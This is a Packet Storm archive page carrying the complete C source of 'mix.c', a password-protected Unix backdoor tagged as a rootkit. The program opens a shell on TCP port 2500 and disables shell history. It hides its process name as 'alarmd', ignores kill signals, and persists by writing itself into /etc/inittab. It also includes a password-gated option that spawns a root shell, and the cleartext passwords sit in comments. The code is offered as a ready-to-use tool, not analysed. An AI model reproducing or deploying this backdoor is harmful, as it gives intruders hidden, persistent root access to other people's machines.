what you don't know can hurt you

mix.c

mix.c
Posted May 20, 2004
Authored by Serial Killah

Simple generic backdoor protected by a password encrypted with an MD5 hash. Gets added into inittab.

tags | tool, rootkit
systems | unix
MD5 | 472a0b9ee3932c0c401d7f1c6c043625

mix.c

Change Mirror Download
/* simple generic backdoor protected by a password encrypted with MD5 
* it can also give you root privileges also protected by a password encrypted with MD5
* greets to ^sq,UnPlugged,houdini,Angelboy and all my friends
* special thanks to ins1der and Lecsi for helping me when i needed and answering my questions
* for suggestion or some other stuff skilla@myway.com
*/

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BANNER "w0rd:"
#define MSG "Die bitch"
#define NOTE "All commands must end with a ;\n"
#define ROOT_PWD "c2ec25302de6c6ab729dbca78b9ec9ce" // 0wned
#define ROOTME_PWD "f291caaa8226b6ccbceb9ac54ef3c03c" // w00t
#define INIT_FILE "/etc/inittab"
#define HOME_DIR "/"
#define HIDE "alarmd"
#define PORT 2500
#define BACKLOG 3

short int login(int fd);
void install(char *argv);
void usage(char *argv);
void rootme(char *argv,char *opt);
void backdoor(char *argv);
void child(int fd,int nfd);

char *shell[]={"/bin/sh",NULL};
char *env[]={"HISTFILE=/dev/null",NULL};

short int login(int fd)
{
FILE *pipe;
int i;
char md5pwd[36],com[1024],pwd[50];

memset(&md5pwd,'\0',sizeof(md5pwd));
memset(&com,'\0',sizeof(com));
memset(&pwd,'\0',sizeof(pwd));

if ((send(fd,BANNER,sizeof(BANNER),0))==-1)
{
perror("send()");
exit(0);
}
if ((recv(fd,pwd,sizeof(pwd),0))==-1)
{
perror("recv()");
exit(0);
}
for (i=0;i<strlen(pwd);i++)
switch(pwd[i])
{
case '!':
case ';':
case '&':
case '>':
case '`':
case '\r':
case '\n':
pwd[i]='\0';
break;
}
snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",pwd);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipe);
pclose(pipe);
if (!strcmp(ROOT_PWD,md5pwd))
{
if ((send(fd,NOTE,sizeof(NOTE),0))==-1)
{
perror("send()");
exit(0);
}
return 1;
}
else
return 2;
}

void install(char *argv)
{
FILE *init;
int i;
char loc[60],ini[100];

memset(&ini,'\0',sizeof(ini));
memset(&loc,'\0',sizeof(loc));
getcwd(loc,sizeof(loc));

for (i=1;i<strlen(argv);i++)
argv[i-1]=argv[i];
argv[i-1]='\0';
strncat(loc,argv,strlen(argv));
strncat(ini,"bf:23:once:",11);
strncat(ini,loc,strlen(loc));
strncat(ini," -s",3);
if ((init=fopen(INIT_FILE,"a"))==NULL)
{
perror("open()");
exit(0);
}
fprintf(init,"\n%s",ini);
fclose(init);
exit(0);
}

void usage(char *argv)
{
fprintf(stdout,"Generic backdoor by sk\n");
fprintf(stdout,"Usage:%s\n\t",argv);
fprintf(stdout,"-i:install\n\t");
fprintf(stdout,"-r <password>:give root privileges\n\t");
fprintf(stdout,"-s:start\n");
fprintf(stdout,"skilla@myway.com\n");
exit(0);
}

void rootme(char *argv,char *opt)
{
FILE *pipe;
char com[1024],md5pwd[36];

memset(&com,'\0',sizeof(com));
memset(&md5pwd,'\0',sizeof(md5pwd));

snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",optarg);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipe);
pclose(pipe);

if (!strcmp(ROOTME_PWD,md5pwd))
{
setuid(0);
setgid(0);
execve(shell[0],shell,env);
}
else
printf("%s is out of order",argv);
exit(0);
}

void child(int fd,int nfd)
{
short int res;

close(fd);
res=login(nfd);
if (res==1)
{
dup2(nfd,0);
dup2(nfd,1);
dup2(nfd,2);
chdir(HOME_DIR);
execve(shell[0],shell,env);
}
else
exit(0);
}

void backdoor(char *argv)
{
int fd,nfd;
struct sockaddr_in serv;
struct sockaddr_in cli;

signal(SIGCHLD,SIG_IGN);
signal(SIGINT,SIG_IGN);
signal(SIGKILL,SIG_IGN);
signal(SIGHUP,SIG_IGN);
signal(SIGTERM,SIG_IGN);

if (fork())
exit(0);


if ((fd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(0);
}
serv.sin_family=AF_INET;
serv.sin_port=htons(PORT);
serv.sin_addr.s_addr=INADDR_ANY;
memset(&(serv.sin_zero),'\0',8);

if ((bind(fd,(struct sockaddr *)&serv,sizeof(struct sockaddr_in)))==-1)
{
perror("bind()");
exit(0);
}
if ((listen(fd,BACKLOG))==-1)
{
perror("listen()");
exit(0);
}
for (;;)
{
int sin_size=sizeof(struct sockaddr_in);

if ((nfd=accept(fd,(struct sockaddr *)&cli,&sin_size))==-1)
{
perror("accept()");
exit(0);
}
switch(fork())
{
case -1:perror("fork()");
exit(0);
case 0:child(fd,nfd);
default:close(nfd);
wait(NULL);
}
}
}

int main(int argc,char *argv[])
{
int op;
char opt[4]="isr:";

op=getopt(argc,argv,opt);

if (argc>1 && argv[1][1]=='s')
{
memset(argv[1],'\0',strlen(argv[1]));
memset(argv[0],'\0',strlen(argv[0]));
strcpy(argv[0],HIDE);
}

switch (op)
{
case 'i':install(argv[0]);
break;
case 'r':rootme(argv[0],optarg);
break;
case 's':backdoor(argv[0]);
break;
default:usage(argv[0]);
}
}

Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    26 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    2 Files
  • 9
    May 9th
    2 Files
  • 10
    May 10th
    13 Files
  • 11
    May 11th
    17 Files
  • 12
    May 12th
    22 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    9 Files
  • 15
    May 15th
    2 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    21 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close